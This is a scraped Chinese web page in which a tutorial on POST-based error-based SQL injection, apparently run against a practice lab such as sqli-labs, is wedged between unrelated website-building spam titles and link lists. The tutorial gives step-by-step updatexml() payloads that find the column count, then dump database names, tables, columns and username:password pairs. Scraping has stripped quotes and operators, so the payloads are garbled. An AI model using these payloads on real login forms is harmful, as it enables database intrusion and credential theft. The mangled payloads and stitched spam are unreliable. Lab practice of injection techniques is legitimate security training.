当前位置: 首页 > news >正文

济南网站建设设计制作公司做物流的网站有哪些内容

济南网站建设设计制作公司,做物流的网站有哪些内容,优化关键词哪家好,杭州企业建站程序post提交报错注入 闭合方式及注入点 利用hackbar进行注入#xff0c;构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错#xff0c;根据分析#xff0c;闭合方式. 确定列数 构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注…post提交报错注入 闭合方式及注入点 利用hackbar进行注入构造post语句 unameaaapasswdbbbSubmitSubmit 页面报错根据分析闭合方式. 确定列数 构造 unameaaa or 11 # passwdbbbSubmitSubmit 确定存在注入 unameaaa order by 3 # passwdbbbSubmitSubmit 有报错 unameaaa order by 2 # passwdbbbSubmitSubmit 无报错列数2 回显位置 unameaaa union select 1,2 # passwdbbbSubmitSubmit 发现页面没有回显想到前面 存在报错想到报错注入 使用updatexml()函数来进行报错注入 查询数据库与版本等 unameaaa union select 1,updatexml(1,concat(‘~’,(select database())),3) # passwdbbbSubmitSubmit 数据库名unameaaa union select 1,updatexml(1,concat(‘~’,(select version())),3) # passwdbbbSubmitSubmit 版本 爆出所有数据库 unameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select schema_name from information_schema.schemata limit 5,1)),3) # passwdbbbSubmitSubmit 通过修改limit函数的值来查询所有的数据库名 爆出所有表名 unameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 2,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select table_name from information_schema.tables where table_schemadatabase() limit 3,1)),3) # passwdbbbSubmitSubmit 得到users表 爆出列名 unameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 0,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 1,1)),3) # passwdbbbSubmitSubmitunameaaa union select 1,updatexml(1,concat(‘~’,(select column_name from information_schema.columns where table_schemadatabase() and table_name‘users’ limit 2,1)),3) # passwdbbbSubmitSubmit 得到列id,username,password 爆出数据 unameaaa union select 1,updatexml(1,concat(‘~’,(select concat(username,‘:’,password) from security.users limit 0,1)),3) # passwdbbbSubmitSubmit 修改0的值就可以得到所有的数据 完成
http://www.sczhlp.com/news/187455/

相关文章:

  • 网站建设美词原创网上花店网站建设规划书
  • 顺德网络营销网站佛山市门户网站建设
  • 怀化网站建设哪家便宜怎么用自己的电脑搭建网站
  • wordpress网站被镜像南京最新情况最新消息今天
  • 南京建行网站北京做兼职从哪个网站好
  • 做模板网站推荐乐云seo品牌策划ppt
  • 做网站模板赚钱在门户网站建设上的讲话
  • 做网站上是外部连接怎么改公网怎么做网站
  • 类似设计师联盟的网站做的网站老是掉线
  • wap网站开发公司网站首页html制作代码
  • 网站设计想法宾果 wordpress
  • cn域名做网站微信网站什么做
  • 山西建站优化购物网站首页界面设计
  • 百度aipage智能建站采集伪原创wordpress
  • 做网站怎么赚钱 111wordpress修改固定链接
  • 小说网站需求分析成都房地产公司排行榜
  • 惠州建设网站公司做flash网站遇到函数
  • 0建设营销型网站步骤网站建设费走什么科目
  • 深圳网站的设计公司网页设计软件排名
  • 南昌二手网站开发方案王烨画家简历
  • 外贸自己建网站网站备案渝
  • 建网站找汉狮现在如何进行网上推广
  • 建设网站便宜网站建设的网站分析怎么写
  • 内江规划建设教育培训中心网站园林网站源代码
  • Arista EOS 4.35.0F 发布 - 适用于下一代数据中心和云网络的可扩展操作系统
  • Arista cEOS 4.35.0F 发布 - 针对云原生环境设计的容器化网络操作系统
  • Arista vEOS 4.35.0F 发布 - 虚拟化的数据中心和云网络可扩展操作系统
  • 因果机器学习的技术发展与挑战
  • 中国做水产的有什么网站idc数据中心排名
  • 个人如何建立网站微信公众号怎么做链接网站吗